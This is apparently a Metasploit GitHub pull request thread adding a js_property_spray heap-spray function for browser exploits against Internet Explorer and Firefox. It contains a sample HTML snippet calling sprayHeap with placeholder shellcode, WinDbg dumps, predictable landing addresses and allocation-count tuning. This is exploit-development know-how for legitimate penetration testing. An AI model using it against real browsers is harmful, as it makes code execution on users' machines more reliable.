New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adds new function js_property_spray #1531

Merged
merged 13 commits into from Feb 28, 2013

Conversation

Projects
None yet
6 participants
@wchen-r7
Copy link
Contributor

wchen-r7 commented Feb 28, 2013

This heap spray technique takes advantage of MSHTML's SetStringProperty (or SetProperty) function to trigger allocations by ntdll!RtlAllocateHeap. It is based on Corelan's publication on "DEPS – Precise Heap Spray on Firefox and IE10".

It has been tested on IE 8, 9, and 10. Also on Firefox.

Here's a very basic example on how to test the new function:

def load_exploit_html(cli, req)
    spray = js_property_spray

    html = %Q|
    <html>
    <head></head>
    <body>
    <script>
    #{spray}

    var s = unescape("%u4141%u4141%u4242%u4242%u4343%u4343%u4444%u4444%u4545%u4545%u4646%u4646%u4747%u4747");
    sprayHeap({shellcode:s});
    alert("done");
    </script>
    </body>
    </html>
    |

    return html
end
@jlee-r7

This comment has been minimized.

Copy link
Contributor

jlee-r7 commented Feb 28, 2013

It would be nice for the documentation to mention where your shellcode ends up in memory.

@corelanc0d3r

This comment has been minimized.

Copy link
Contributor

corelanc0d3r commented Feb 28, 2013

0x20302228 on IE and 0x20302210 on firefox
(provided that these addresses are not taken by a module that belongs to the app you're targetting)
For regular browser environments these addresses are reliable

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Feb 28, 2013

jlee-r7, we have second thoughts about that because you can say the shellcode is landing at address X, but if your dev env is loaded with random junk, modules could occupy that particular memory address. If that's the case, those who lack understanding on how spraying works can just blame us for their own problems. In my opinion, they should be able to find it themselves.

I actually have a blog on the way that will mention where you'll see your code in memory.

@jvazquez-r7

This comment has been minimized.

Copy link
Contributor

jvazquez-r7 commented Feb 28, 2013

Awesome work! Congratulations! Sharing my test results:

  • IE 9 / Win 7 SP1:
0:023> db 0x20302228
20302228  41 41 41 41 42 42 42 42-43 43 43 43 44 44 44 44  AAAABBBBCCCCDDDD
20302238  45 45 45 45 46 46 46 46-47 47 47 47 20 20 20 20  EEEEFFFFGGGG    
20302248  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302258  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302268  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302278  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302288  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302298  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
  • IE10 / Win7 SP1: With IE10 it isn't super stable:

Sometimes the shellcode isn't in the expected address:

0:027> db 0x20302228
20302228  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302238  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302248  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302258  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302268  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302278  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302288  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302298  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
0:027> lmv m iexplore
start    end        module name
00110000 001cc000   iexplore   (deferred)             
    Image path: C:\Program Files\Internet Explorer\iexplore.exe
    Image name: iexplore.exe
    Timestamp:        Sun Feb 17 07:18:00 2013 (51207618)
    CheckSum:         000C0D20
    ImageSize:        000BC000
    File version:     10.0.9200.16521
    Product version:  10.0.9200.16521
    File flags:       0 (Mask 3F)
    File OS:          40004 NT Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Microsoft Corporation
    ProductName:      Windows® Internet Explorer
    InternalName:     iexplore
    OriginalFilename: IEXPLORE.EXE
    ProductVersion:   10.00.9200.16521
    FileVersion:      10.00.9200.16521 (win8_gdr_soc_ie.130216-2100)
    FileDescription:  Internet Explorer
    LegalCopyright:   © Microsoft Corporation. All rights reserved.

Sometimes it's near from the expected address:

0:025> db 0x20302228
20302228  45 45 45 45 46 46 46 46-47 47 47 47 20 20 20 20  EEEEFFFFGGGG    
20302238  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302248  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302258  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302268  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302278  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302288  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302298  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20       

And others the shellcode is at the expected address:

0:026> db 0x20302228
20302228  41 41 41 41 42 42 42 42-43 43 43 43 44 44 44 44  AAAABBBBCCCCDDDD
20302238  45 45 45 45 46 46 46 46-47 47 47 47 20 20 20 20  EEEEFFFFGGGG    
20302248  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302258  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302268  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302278  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302288  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302298  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20     

After increasing maxAllocs seem to work better:

sprayHeap({shellcode:s, maxAllocs:0x500});
0:025> db 0x20302228
20302228  41 41 41 41 42 42 42 42-43 43 43 43 44 44 44 44  AAAABBBBCCCCDDDD
20302238  45 45 45 45 46 46 46 46-47 47 47 47 20 20 20 20  EEEEFFFFGGGG    
20302248  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302258  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302268  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302278  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302288  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302298  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20     
  • FF 19 / Win7 SP1: working as expected
0:036> db 0x20302210
20302210  41 41 41 41 42 42 42 42-43 43 43 43 44 44 44 44  AAAABBBBCCCCDDDD
20302220  45 45 45 45 46 46 46 46-47 47 47 47 20 20 20 20  EEEEFFFFGGGG    
20302230  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302240  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302250  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302260  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302270  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302280  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  

The @wchen-r7 explanation about the landing address topic has sense. On the other hand, would be nice to update the comment with a link to the blog post once its written.

Checking with @wchen-r7 about the IE10 case and merging once he agrees.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Feb 28, 2013

Juan -- yeah, that behavior for IE 10 is actually expected. When I was testing with Peter, he told me that anything below 0x350 times, the success rate seems to drop. So we decided to set it to 0x350 as default. Based on your results, maybe that value needs to be a bit higher. I think what I can do is mention this in the blog, that way people can be aware of that.

@jvazquez-r7

This comment has been minimized.

Copy link
Contributor

jvazquez-r7 commented Feb 28, 2013

Awesome, has sense! merging!

@jvazquez-r7 jvazquez-r7 merged commit 18c0bb0 into rapid7:master Feb 28, 2013

1 check passed

default The Travis build passed
Details
@corelanc0d3r

This comment has been minimized.

Copy link
Contributor

corelanc0d3r commented Mar 1, 2013

yeah in fact, i had it set to 0x500 in my original scripts (for IE10)

@Hotoon

This comment has been minimized.

Copy link

Hotoon commented Dec 9, 2013

I used the first script published in "DEPS – Precise Heap Spray on Firefox and IE10" , after debugging the heap using !heap -stat -h , I got confused becuse the output shows 500 iteration of a Heap Block size of 7ff52 (I used the same default value 0x80000)

0:011> !heap -stat -h
Allocations statistics for
heap @ 002d0000
group-by: TOTSIZE max-display: 20
size #blocks total ( %) (percent of total busy bytes)
7ff52 500 - 27fc9a00 (99.79)

Moreover , After I dumped the memory I encountered a heap corruption as illustrated below

0:011> !heap -flt s 0x7ff52
_HEAP @ 2d0000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
invalid allocation size, possible heap corruption
03b40018 ffea 0000 [00] 03b40020 7ff52 - (busy VirtualAlloc)
invalid allocation size, possible heap corruption
03d40018 ffea ffea [00] 03d40020 7ff52 - (busy VirtualAlloc)
invalid allocation size, possible heap corruption
04ab0018 ffea ffea [00] 04ab0020 7ff52 - (busy VirtualAlloc)

Why it is not showing the same output as your expermint in "New Heap Spray Technique for Metasploit Browser Exploitation" !
I'm using a VM Win 7 SP1 with IE 10.

@corelanc0d3r

This comment has been minimized.

Copy link
Contributor

corelanc0d3r commented Dec 10, 2013

the implementation in the Metasploit Framework is an optimized version of the script on www.corelan.be. Can you please try the metasploit version & compare the output with the "New Heap Spray Technique for Metasploit Browser Exploitation" post ?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment